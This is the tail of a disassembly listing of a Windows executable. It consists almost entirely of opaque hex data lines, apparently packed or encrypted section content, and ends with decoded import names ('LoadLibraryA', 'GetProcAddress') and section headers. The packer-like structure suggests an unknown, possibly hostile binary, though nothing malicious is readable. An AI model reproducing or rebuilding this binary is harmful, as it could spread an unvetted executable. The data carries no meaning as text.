dd 804F371Bh, 55454FA6h, 0FBB5A69Fh, 431135A4h, 26D628A2h
dd 0BD375943h, 0DD033BCCh, 812BC8D8h, 72A20237h, 2A5F13CFh
dd 4F45CA4Dh, 7DA65797h, 113D8571h, 34309461h, 0B74C4385h
dd 89B10981h, 49A912ADh, 1743A578h, 0C73C45D0h, 0DB10C8Dh
dd 0BD6C9094h, 0B8826922h, 93655306h, 98551A1h, 42912E91h
dd 0B95E640Dh, 5C42E01Ch, 0DD0BFD0h, 5FAC6522h, 4A9935E2h
dd 0A145D823h, 0DF9E1251h, 0A546DB69h, 0B807E718h, 514309A2h
dd 0B50BA123h, 0AED1AAB0h, 0A4CA48D9h, 45659551h, 18DD9B83h
dd 35192A14h, 63C44BF2h, 9A054DA0h, 190B0F58h, 0F1220AB4h
dd 1A3BDC44h, 16ED78DEh, 3FB84D1Ah, 0B9AE75E7h, 9F994837h
dd 16321A0Ah, 51BB4CE1h, 2DDE1755h, 0C145FEAEh, 9F09BC9Ch
dd 40CCB259h, 91747C0Eh, 59484769h, 0B9796614h, 0AC0E488Bh
dd 259469D4h, 49C81694h, 0A012B587h, 9F94A2CFh, 48418855h
dd 1908FD6Ah, 0D5B50958h, 60630DAFh, 487A4F2Dh, 2828789Ah
dd 0C81B67Fh, 0FC3B10F5h, 0FE06A199h, 2C0649F1h, 88BD2944h
dd 44D17DB6h, 0F944992Eh, 2885221Fh, 0C42068A2h, 24C7DF0h
dd 48B9D8D4h, 0A3E0DEB3h, 58BA0B06h, 0A2AA10B4h, 4F31080Dh
dd 1906FC94h, 0D60B35FEh, 0E5F52554h, 956516B1h, 9A3B01A7h
dd 0F9B99DDh, 0BA6CC75Fh, 8A9B2CC7h, 480C997Bh, 77FEB579h
dd 12EBD31Dh, 374521B1h, 76BA6259h, 0CB355536h, 481D21FFh
dd 0CC487511h, 5648D02Ah, 7122150Dh, 83AA18D0h, 3D446935h
dd 6758250Bh, 0F1FE51E0h, 0CDE14948h, 1B191068h, 9B6D370Ch
dd 0A5126ECh, 0D0154479h, 576664B5h, 815A7DFFh, 29D6D532h
dd 6E0BAA28h, 7D6245AAh, 4D965AACh, 61841335h, 8969B77Ch
dd 1F1923D6h, 36E65FEh, 0B5F884CEh, 0E885489h, 0ECA6A79Dh
dd 9163E34h, 42071411h, 50663E0Dh, 44522E23h, 0D97F760Eh
dd 661FB162h, 28538258h, 53C9F05Fh, 28842791h, 2A68474h
dd 7D2E1D08h, 41503099h, 57D1D429h, 0B424DA36h, 6E0740BCh
dd 0FCD5289Dh, 3BD34AF2h, 453911Ah, 0D0228183h, 0C90D0DA4h
dd 27ADEED4h, 12933517h, 0EAC2DEBAh, 0D21A3EC1h, 7E39E511h
dd 9AE1762Ah, 0D9D00A3Dh, 0D1E5BD58h, 92D51461h, 0A93F6D87h
dd 4A2A8622h, 5E4BCD61h, 426B3722h, 7B9682Eh, 9A89F432h
dd 520602E7h, 4834C4E3h, 507B9E3Fh, 79B50FE8h, 915D64A5h
dd 1BFC1CA9h, 0CB744329h, 1A1E439Bh, 3854412Ah, 3FD21DA9h
dd 8671B614h, 12A876E2h, 0D1D426Bh, 6B133092h, 8E25B5E9h
dd 495BB6A3h, 427736CCh, 3B639EE1h, 0BF8D7DC3h, 1FE1A246h
dd 1AABE110h, 9413CBB4h, 0D815ED31h, 5F4159C8h, 120198A6h
dd 1D3CD195h, 0BC1E0444h, 53391A25h, 0A1863143h, 924A05A0h
dd 1E2308E8h, 94797D24h, 79895E72h, 95550204h, 67B50353h
dd 174A7328h, 0E11B6652h, 0FDB5A8B8h, 69589151h, 5505CAA4h
dd 7A0D9B5Dh, 57B6244Bh, 0A0654D20h, 0B5EA3119h, 0D1533243h
dd 0B45A1A7Eh, 30AD637Ah, 68331720h, 0F93516BDh, 81544F26h
dd 7438E582h, 961A64CDh, 373FC92Ah, 0E490B4C4h, 4BADD163h
dd 0CB1A7124h, 946D512Ah, 29159620h, 353EC144h, 0B50D1D49h
dd 212F4D86h, 8A910591h, 0FCAB453Ch, 564299B5h, 94E7B120h
dd 799E0658h, 0AE0FEE8Bh, 125A5308h, 0F5663E6Dh, 8C184961h
dd 0A1FB5006h, 289C1466h, 20419A53h, 44142820h, 1FAE405Fh
dd 512EFA46h, 111F21B4h, 7CB41477h, 0F3D588ACh, 60DE06D0h
dd 214F1394h, 58B4B510h, 12EE5072h, 0B6D2E9B4h, 566DB6D9h
dd 8F10F207h, 0F5E09D57h, 310F5402h, 0D7B6487Dh, 675CDC12h
dd 0ECAACF13h, 1D7C5921h, 0C8130FA9h, 202AA012h, 0B42859E3h
dd 0DD486C15h, 84C5A885h, 0E553604Ah, 11D64182h, 87D421Dh
dd 3807B919h, 8B793310h, 0C8761FEDh, 0C46966B5h, 5B293772h
dd 0BD139B34h, 11A22E62h, 61FE024Ch, 6051FCE4h, 70289A06h
dd 0D64532Fh, 0CE5E8118h, 651E4404h, 2A2245B2h, 788A589Ah
dd 9B0849E4h, 8DB5500Ch, 0C7B4C5C6h, 21352915h, 0DD951AEh
dd 0DE268B58h, 7EAB6366h, 35FC433Fh, 0C14A913Dh, 52B9133h
dd 0F8B1CE3Bh, 0E7A29C94h, 8F26887Dh, 0BDC082C9h, 804972A6h
dd 53223B06h, 52090934h, 50A863D9h, 819440Dh, 21859A7h
dd 1B4016FFh, 11908564h, 0A25CA510h, 0C8C4070Ch, 52290F50h
dd 0CC770938h, 0B447C82Ch, 2035BF57h, 0DF85735h, 73573420h
dd 57312042h, 33200DCAh, 2CC88742h, 0C834D715h, 1A1F1128h
dd 5025D2B4h, 0BD8EA122h, 9AE54939h, 67B50CD4h, 2BB464ABh
dd 89FC5F39h, 71845C1Dh, 0E89D827Dh, 0BD74212Dh, 0DEA5C3A9h
dd 0D6EA5F8h, 0A8A1E8BEh, 0D65314E2h, 3D6810D8h, 2454BF08h
dd 2809F95Eh, 1301CA20h, 29AA64D3h, 9AB07915h, 799D36F4h
dd 0D60A12DDh, 46BB18D0h, 0C65C141Fh, 289B5519h, 0D9D56A80h
dd 515D503Ch, 0DA0D0660h, 0DEB60788h, 0A3940FA4h, 80225D1Eh
dd 51D051EEh, 0F4300AD8h, 0CAA3546Bh, 855C46C7h, 0C6306A28h
dd 0B385350Dh, 0F5654CFh, 0D1408D48h, 0B53EAC76h, 4685AA86h
dd 5A84A89Dh, 4849C1FCh, 2E792A6Bh, 68A1A8CBh, 0C85A869Ah
dd 53D04F25h, 2CFD8B55h, 7D4FB552h, 8D1C48C3h, 8D06491Dh
dd 228C9C7Eh, 83744D8Fh, 4C34D183h, 4F891591h, 65688281h
dd 8A45914Ch, 0B92FA670h, 0C89E14A6h, 26566134h, 56FA9935h
dd 1AB50E88h, 3C18A449h, 62C246DFh, 99AB2D35h, 19D94A62h
dd 1A752FBAh, 72D4322Ah, 4DE9214Ch, 3531F6A0h, 5EB5AFE5h
dd 3EDA89A6h, 200CF128h, 0E0EAA5AAh, 29EB5B59h, 5664526Dh
dd 9C86109Ch, 194A94C1h, 5F3CFACh, 0C3816B6h, 0A5BB20CBh
dd 0C0822137h, 8458E9A1h, 3C21A14Bh, 12ACD650h, 72B3AF87h
dd 15A50E25h, 24A591FEh, 0FEAEF116h, 8E442BEh, 87B4711Fh
dd 0C52C10B7h, 11D6E8E4h, 0E52951EDh, 46B5124Ah, 0DC49432Eh
dd 0EADF1A27h, 0E231F85Dh, 26D6BA46h, 0AF54E5D8h, 2AF85291h
dd 9B460F5Eh, 400F81D8h, 0F58B805Fh, 0D08339E0h, 0C879D311h
dd 114CBD3Eh, 969E84BFh, 5998191h, 35056A59h, 7A12FD48h
dd 0D00F5C58h, 84A95018h, 344645BDh, 28C8DD76h, 91A5AF71h
dd 8971E1A5h, 4C468928h, 12754529h, 34B17909h, 59321FF1h
dd 0CE1BE5CCh, 91C54671h, 0B5DDA21Bh, 0B8191053h, 69908585h
dd 2B1B0AA9h, 0FD535379h, 0B511A67Ah, 0AD89AC47h, 6EE1441Bh
dd 8948F923h, 0B7478AF3h, 380595DCh, 728D41A8h, 6C4BB454h
dd 0F924C88Ah, 32B30DA1h, 6739E447h, 1CE8517Bh, 179BF512h
dd 1642F111h, 0A5BF89C8h, 3052CD7Fh, 44A9351Eh, 0BE4F1E97h
dd 0E1644CC8h, 0D476DE84h, 36650FE8h, 23A117Dh, 0B8AEA2A2h
dd 41882095h, 6D250CA3h, 0CB6C2581h, 2F13E97h, 35102E5Bh
dd 548E4AA5h, 422AE2F4h, 4D11438Fh, 1E418C58h, 9E27B915h
dd 264CD45Fh, 44B25C8Ah, 43B64419h, 2D88E4B8h, 9219E7A5h
dd 446DE7FBh, 51E4DE6Fh
dd 0A33119B3h, 118B39FCh, 90AF8CFEh, 517A3554h, 11F60A80h
dd 849D08B9h, 0B867B045h, 35C219C8h, 0C5756AA1h, 204C26B7h
dd 28CBA413h, 822E68A2h, 647A5C8Ah, 40C05601h, 0A44B91FEh
dd 42854508h, 0AC7E351Ch, 4465A5BAh, 24308632h, 0EC740548h
dd 35126926h, 26644B99h, 46091B32h, 0A4169761h, 9DDE2BA8h
dd 1F0D692Bh, 0B4257949h, 0D532C80h, 0B5FD33D1h, 7C8904D9h
dd 721CA538h, 42CC0FD2h, 77C9BA46h, 19574936h, 0CFEB1340h
dd 0D0E110CEh, 8D8D5C19h, 3789B621h, 0AF57D167h, 0E8660F99h
dd 70942E51h, 46885E92h, 10BB4AB6h, 50FC2870h, 10D70F8Ch
dd 0B606D54Dh, 514354B9h, 4F2E4DF0h, 5184818Ch, 64609EDBh
dd 74825F54h, 0B04413B3h, 0D80AA443h, 9C664806h, 48B3B1B6h
dd 368E5E50h, 851C16D3h, 8A2B9D6Eh, 0F78CF32Ah, 41600CDEh
dd 40A3CEA9h, 0D7125828h, 82E35B6h, 360A0E29h, 546951F6h
dd 4A69D8B4h, 72D93480h, 73115A3Ah, 11497DC9h, 0F8532856h
dd 6D1FF808h, 0F60E08D4h, 9566862Eh, 9004CA6Fh, 0C14A4F73h
dd 8714258Dh, 0CCB07DA4h, 3B484144h, 284B4D31h, 35164786h
dd 1C774151h, 3FF09CA9h, 9AE95E29h, 0F660B931h, 285CEE68h
dd 78516A79h, 69832609h, 161322F8h, 7A6A7666h, 0A5C1819h
dd 9A6A8892h, 0A1455855h, 0E12F0F6Ah, 0A12C0B0Eh, 10AD19DFh
dd 0C06E1381h, 0BCB928D4h, 0BED6EA83h, 2F449C2Ch, 44B61982h
dd 46581061h, 45621E15h, 10605014h, 567E4DBCh, 55461195h
dd 28EDB5EDh, 269A76F6h, 0EE8B873h, 74D3BCCh, 0F710532Ah
dd 0E572DA19h, 780F7869h, 32D882E9h, 3ACB61CAh, 7EB12A8Dh
dd 0B93F434Ch, 0AE384B4h, 16B8AD4Ch, 0BFB72959h, 97394838h
dd 8459BA87h, 0B78C7DECh, 0BA5852ADh, 2E166431h, 785F6345h
dd 0C574B536h, 855F4268h, 0CD2F8FB6h, 0BCDB612h, 71C5037Ch
dd 9A5B9918h, 0A01927D8h, 0EA3D6239h, 9C2D0E2Ch, 1F15C65Bh
dd 0B66444DEh, 179241A7h, 5361BB2h, 0F6012291h, 3AA152Bh
dd 62D0527Dh, 0B78F914Eh, 2A20CE41h, 25D02ED9h, 67D4BAECh
dd 2335060Dh, 67DD593Bh, 0D851E9F6h, 0B2FA6516h, 121DA04Dh
dd 0F9BC5F5Ch, 11078286h, 90F2660Dh, 0A4402E95h, 0E0A1D20Eh
dd 18A23962h, 635C5712h, 2B389545h, 0DE701428h, 1D0A08E0h
dd 5134792Eh, 0D42D53D1h, 2E3B59BDh, 466493Dh, 2867B807h
dd 614280DDh, 0C33B639Eh, 2D23867Dh, 0C4423FA3h, 422BA329h
dd 9E80902Bh, 6121473Ch, 84A32950h, 0EF862D76h, 4D3730F6h
dd 0B40DB293h, 564A23EDh, 6473D6DCh, 4D96A0FDh, 6E9A4C41h
dd 0EB76AB11h, 0D929F29h, 88714C68h, 0EE9498B6h, 5482173h
dd 0AAE73716h, 27F30E68h, 9632AA47h, 94719731h, 1DE25507h
dd 2920D228h, 696829FEh, 0B5D07583h, 5D4D2E20h, 34784504h
dd 3E1A2C62h, 2756628Ch, 991BD1DEh, 6D4AC4B6h, 0A3BC6588h
dd 74290BE1h, 0EF8703CCh, 9C0B3224h, 4DD13617h, 0E6CBDE55h
dd 0B674394h, 0D5A6D761h, 39DD5C64h, 770D538Ch, 628945ECh
dd 4DB617F0h, 9459BC34h, 0B42F215Eh, 788265D3h, 0A183D645h
dd 0C8DF4B9Fh, 34C76E19h, 42252AB6h, 0F0932925h, 40156C4Ch
dd 0B5295550h, 11CB2C2h, 0B244599Bh, 281FB00Bh, 151DCE5Bh
dd 4A902554h, 0B68D2588h, 0B611968h, 0AD224939h, 6142D7FBh
dd 0E5668F0Fh, 312C4E28h, 594A841Ah, 0AE0307F4h, 0EF8A98C4h
dd 0F849422Bh, 4609A3A5h, 85808ADAh, 0DBCA152h, 0C868F8B4h
dd 423541A5h, 9111261Dh, 0A04E24B3h, 28243A22h, 0B0591E57h
dd 45C4E462h, 5535055Eh, 0A1B55361h, 0A4C85217h, 9AFE9EF2h
dd 0AFB2FCB9h, 3ACC12A0h, 8538214Ah, 0CDC6854h, 222B1216h
dd 28923503h, 0D378F54h, 0E8A541E7h, 25600819h, 44D0D611h
dd 0C61EB10Ch, 68541E92h, 89DC4A3Bh, 0F529AC72h, 0AD453E16h
dd 603AE04h, 294F285Eh, 218FB1A4h, 55B50922h, 0F54BBB7Ah
dd 0B1B31B16h, 3DE6B4D3h, 0E18A414Fh, 9D72A092h, 171CA745h
dd 0E15EA8D5h, 68384A7h, 0B458700Dh, 323FA392h, 1440DEDDh
dd 352A0329h, 0B1214801h, 60E592A7h, 5354B3Bh, 0A54916A5h
dd 136432D5h, 5C158048h, 519B4197h, 0E5B5134Ch, 62B6DD8Ah
dd 0B551E030h, 5B9BA03Ah, 0B2447614h, 1AA1316Dh, 7436DC4Ah
dd 0D01DB641h, 0BD310B44h, 633AD948h, 1B4660A3h, 91DD2214h
dd 7FD4DB30h, 0FA1F1210h, 4A5F2911h, 24DE2AD8h, 9463599Dh
dd 8BA457A5h, 67371435h, 0FF08D218h, 217A28AAh, 620A0B1h
dd 85535D58h, 4111DDB4h, 99B2B16h, 90261D14h, 0B50640CFh
dd 0F5C4214Bh, 0AEA1FFA0h, 91115C5Fh, 2522C9CAh, 6371F6AEh
dd 4ACFD840h, 0CD8A0821h, 86C9C26Ch, 5864025Eh, 412A69A6h
dd 62D14A3Ah, 7F13CD16h, 967599CAh, 46CAF215h, 0A10D210Eh
dd 4A554510h, 0A380A939h, 141D1112h, 0B85F70B6h, 0DAA346A9h
dd 3271EE6Ah, 0FD2A1937h, 65B0B510h, 579A0CA8h, 7A10B20Ch
dd 0F2159169h, 94079561h, 0D695B88Dh, 81966545h, 0C6DA238Dh
dd 0C85554Dh, 15BD19DAh, 0C6D07A32h, 273FBE27h, 15D11791h
dd 684374B2h, 4D229C43h, 962A0CD1h, 980A78DDh, 49991D22h
dd 9A100C67h, 4A49ED58h, 3D45B23Dh, 15E5359Bh, 552025A8h
dd 83D5014Fh, 0A9E5E682h, 5A5FEEB6h, 5EB0DB7Dh, 0B6A8FC9h
dd 9A51E5A3h, 9F083148h, 221A4BA9h, 86F14142h, 681CCC2Ch
dd 0C121539Bh, 76BB552Eh, 0FC6DFE28h, 0A068FB60h, 0C23C4188h
dd 8F350498h, 0A48B194Dh, 9F1DA174h, 90871EEDh, 0C8A54B83h
dd 9BBDAD00h, 5544BC1Eh, 5F317DA3h, 246766FAh, 625F5E4Fh
dd 0B12DA357h, 0A0787BFAh, 0CE9541A0h, 5FB32490h, 454DFFCAh
dd 902C28C6h, 9A428616h, 2D22FDC6h, 5F9AB482h, 0F6B17586h
dd 0F2C9AD8Ch, 2F3C7BE1h, 9535AEE9h, 7F2EC52Fh, 0D6C43CA5h
dd 6483F657h, 42A2C928h, 6D6E51Bh, 8910C24h, 0E00E50CBh
dd 25138A5Fh, 3DE5742Ah, 584B6153h, 5A84306Eh, 31EB5291h
dd 5B1C541Dh, 1B960229h, 0B9BD363Ah, 88CAFE9Ch, 9939CA9Dh
dd 0E92E2B61h, 1DA33B13h, 0B458AECCh, 6CEA5275h, 0E529389Dh
dd 13C85E76h, 85E039FDh, 59A59C51h, 9B8D35A9h, 0B5329D20h
dd 6073A7E2h, 582F5066h, 0A24A2CB4h, 7697F55Eh, 0D99963B4h
dd 4D5D985Fh, 6888324Bh, 355B5D23h, 41C28525h, 290DA5E5h
dd 0C213BE1Eh, 1E126729h, 996C5144h, 12487512h, 8C42F233h
dd 8B4B12C8h, 0FB5A60A1h, 14A256F6h, 8C890B2Bh, 0AC1B9812h
dd 45D8FA16h, 6060489h, 9B992E1Eh, 274144C8h, 79893872h
dd 0EB453B1Bh, 99B60F40h, 28022E2Bh, 9D744E3Fh, 0E085102Dh
dd 82532322h, 21764167h, 926FB6C3h, 571FB473h, 57823050h
dd 11BB5128h, 0B67DF20Bh, 3E5288CFh, 0E45A1A2h, 0C4BF246Ah
dd 0B5210344h, 0A6CAF8Fh, 0D06732E3h, 0F5CD141Dh, 0DE347BCCh
dd 8E42D525h, 7E512DA2h, 28D16B01h, 27CD5165h, 36488E6Ch
dd 3414F925h, 502153DEh, 9185A0BEh, 9466D081h, 150D8A36h
dd 2CA11332h, 7D2C358Eh, 0D24EFD40h, 412981CFh, 0B1B58610h
dd 0B4250CB9h, 0E53611CBh, 9E29CD02h, 66F582F9h, 4AC889F0h
dd 0C833BA65h, 0AB94B509h, 584F9E66h, 5B3DF949h, 2345BBFCh
dd 0C42B582Bh, 85AD1B2Eh, 593D36E6h, 104A2FD8h, 4861DED0h
dd 7934DCD5h, 0A2163C9Fh, 0B5D5690Ah, 5B715A32h, 0CD399FC9h
dd 1DDC45A2h, 44B5F889h, 51182508h, 12270B9Bh, 71129A4Dh
dd 0E8A967F3h, 261A535Ah
dd 521D9235h, 92BEC900h, 0DCCAC532h, 84A0B510h, 102E1476h
dd 51ACA0B5h, 5EF1228Ch, 6540F525h, 4D852E6Dh, 0C012DA62h
dd 0A1C935FDh, 0E44E81Ah, 0D88276A9h, 208DA109h, 0C8D7290Ch
dd 49358515h, 0BDAD725Fh, 5A15B510h, 7C4D39ADh, 41644F6Bh
dd 2F6F8773h, 7B19AD4Eh, 497B09B1h, 0CF192599h, 531EE605h
dd 0B50D1049h, 760CBE40h, 0D13642D9h, 85C829E0h, 0B5E96E2Fh
dd 34A13B1Dh, 943C47ADh, 79A28760h, 0B830798Eh, 0F90A8551h
dd 0B942EABFh, 0FC0EC6A0h, 0B68040FAh, 0C83D7053h, 3A45DE09h
dd 19232F1Bh, 8B146579h, 25DE391Bh, 0B56A711h, 678359CBh
dd 0B960651Ah, 639466B5h, 548F801Fh, 24B6B89Ah, 99C97B4Dh
dd 1651135Ah, 67ADEF60h, 351A7C6Ch, 0C2D578A1h, 0CC58795Bh
dd 8929B51Bh, 7DE364BCh, 0B9781F3Bh, 0BB0D325Fh, 5E8062h
dd 0A8ACB544h, 250AADF5h, 0BC43D94Dh, 15D760CEh, 7D50BD35h
dd 0B54BA56Bh, 0D4249FE2h, 7C6D4277h, 42B31291h, 585F50Dh
dd 8112329Dh, 2D088311h, 97227F46h, 0BD18D507h, 6D3520DDh
dd 4A0D87C6h, 52DA0C6Ch, 0ABB9A9FEh, 14FD4B92h, 4BFFB27Fh
dd 0CB4428A5h, 633731C0h, 0A47E0D35h, 0FFD6453Fh, 32CDF5DFh
dd 0AA2F210Fh, 533E05FDh, 6E372612h, 0E752ED64h, 8B3D554Bh
dd 4B5028BCh, 0D841223Fh, 0D56B629h, 9FC33294h, 18B755D2h
dd 1F457847h, 5F7D7D41h, 94DCFBEAh, 4745964Fh, 588F187Ch
dd 55282F3h, 27BBC4C5h, 94A3C45Bh, 0B4519DFCh, 2972BA6Eh
dd 42188B35h, 25ECD3CDh, 0D8D7D918h, 96211969h, 2921427Ah
dd 7993C5DBh, 10D51922h, 0B05B50B5h, 0A053FA44h, 177B51F2h
dd 0F5420968h, 9798D63Eh, 0B15BACB5h, 9D3B42C8h, 12DCF488h
dd 378420D5h, 22BFE51Ch, 83587626h, 0A49DDE28h, 5E2A6DADh
dd 0C494CA0Dh, 21D44F2Eh, 0D922B74Ch, 0C10654FDh, 0A1555796h
dd 1D850C26h, 0D2C5951h, 61108D6Dh, 268AA892h, 8F664D75h
dd 172F45A2h, 215E34DBh, 220AA1D5h, 989C976Dh, 656B2287h
dd 59810AA7h, 780D50F7h, 0A6752184h, 47B14B08h, 35BBC8F3h
dd 0E6180D79h, 0D0B5E545h, 0D22DC93h, 17E892CAh, 0E299B50Bh
dd 0F3171619h, 0BF2A5BABh, 40E511C2h, 68B69A84h, 0D6ED8A59h
dd 4DA38127h, 1BB94B2Eh, 1440D0A8h, 53DCD99Ah, 0B615F042h
dd 8521F280h, 0DD3F8B90h, 599310C3h, 0D042A990h, 4D21ECF4h
dd 41649347h, 13D319E8h, 0A1497851h, 4EC63C85h, 9464E212h
dd 6BB6E99Ch, 5A41CB17h, 7FAE6855h, 73A773DCh, 4DC10BC8h
dd 244F8733h, 7568BFCAh, 327F17DEh, 0CDD6A919h, 294B3B52h
dd 3E98A9FCh, 1B49789Bh, 39B50C36h, 605B7E00h, 10384400h
dd 454B0760h, 4C304E52h, 382E3233h, 3F06C64h, 65724380h
dd 4D997461h, 78088C75h, 0FB471C41h, 73FD4CF1h, 0E27245F0h
dd 4F01E76Fh, 596EFD70h, 5228081Ah, 6F636DF8h, 3368540Ch
dd 5728641Bh, 1A3369BBh, 0F3635650h, 7F4D8B73h, 28796335h
dd 74B06956h, 6C366175h, 332EB841h, 44207845h, 69EB70EBh
dd 487477D6h, 0DBE26E6Eh, 0C60CD623h, 0C69461Ch, 6157ADC6h
dd 709FF784h, 676E8C53h, 623A4F20h, 0D3633F6Ah, 41554085h
dd 0B3ED6471h, 0E64C20B3h, 7D69E8DAh, 0C0A1ED62h, 73B23289h
dd 57284DBBh, 76508544h, 70507992h, 0BBA36C4Fh, 6E572EF6h
dd 676F1BC9h, 204DFDF3h, 0C79B3053h, 0F2683373h, 0BA14374h
dd 2BDD4E14h, 0FA08C74h, 737208C5h, 0BE0D1064h, 9BDBCD70h
dd 6F283C76h, 74AC6D32h, 47664594h, 51B46282h, 0B2C69F46h
dd 24F01A0Ch, 9825477h, 4E428370h, 38685261h, 3FD853D0h
dd 72717543h, 0D13699D5h, 0F3573713h, 44D677E7h, 0CDFF8BD0h
dd 6C5FE531h, 93888EAh, 5A20ADA3h, 436BCF80h, 7AD175FAh
dd 0D1459056h, 0F0F6DEF9h, 90496015h, 67756265h, 0B772D5E3h
dd 2DBA383Ch, 6952C920h, 943A9070h, 3CADA6C2h, 75286F4Dh
dd 0A2B2879Dh, 7970244Ch, 9D53E746h, 68D2041Eh, 26FF539Ch
dd 0F927F22h, 123AD4DAh, 62970D80h, 65D0E40Ah, 53CF498Ch
dd 709C34DEh, 0F003FF19h, 0FF558134h, 7F228231h, 0D60268C9h
dd 0BD437055h, 3A375AEh, 746191CCh, 2A080466h, 535782FCh
dd 313B5F32h, 0E090803h, 41288A80h, 741ACC49h, 9011924h
dd 22070991h, 1E0B5196h, 1D6B05CAh, 441CE884h, 14891633h
dd 9220313h, 11054412h, 2120F89h, 1487224h, 0C280A91h
dd 4110E179h, 50E65644h, 94A54952h, 0CFA541F9h, 14A412ADh
dd 4326440Ah, 820EA862h, 8A458FAAh, 25A6B668h, 0E681CC8h
dd 634D43C2h, 82949439h, 1F43AE8Ah, 35E4024Dh, 36503415h
dd 3C98D10Ch, 6661A4AAh, 44C4B267h, 84739672h, 6852893Ch
dd 3E671695h, 777C7894h, 8123FD66h, 554CDF79h, 87DA556Ch
dd 0C54B7B27h, 0CB0D5979h, 75A63056h, 410C30FDh, 7911DA4h
dd 81FA3DB7h, 0CB7563E2h, 2949F3CDh, 78636F9Eh, 7934132h
dd 8EDA16C9h, 443BA410h, 53484DE8h, 434F0984h, 543A304Bh
dd 7394C272h, 3166696Dh, 1CD8h, 7E000000h, 6B00605Bh, 656E7265h
dd 2E32336Ch, 6C6C64h, 64616F4Ch, 7262694Ch, 41797261h
dd 74654700h, 636F7250h, 72646441h, 737365h
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
db 0Ch, 60h, 0
dd 2 dup(0)
dd 7D9300h, 600C00h, 8Bh dup(0)
__u_____ ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 608000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start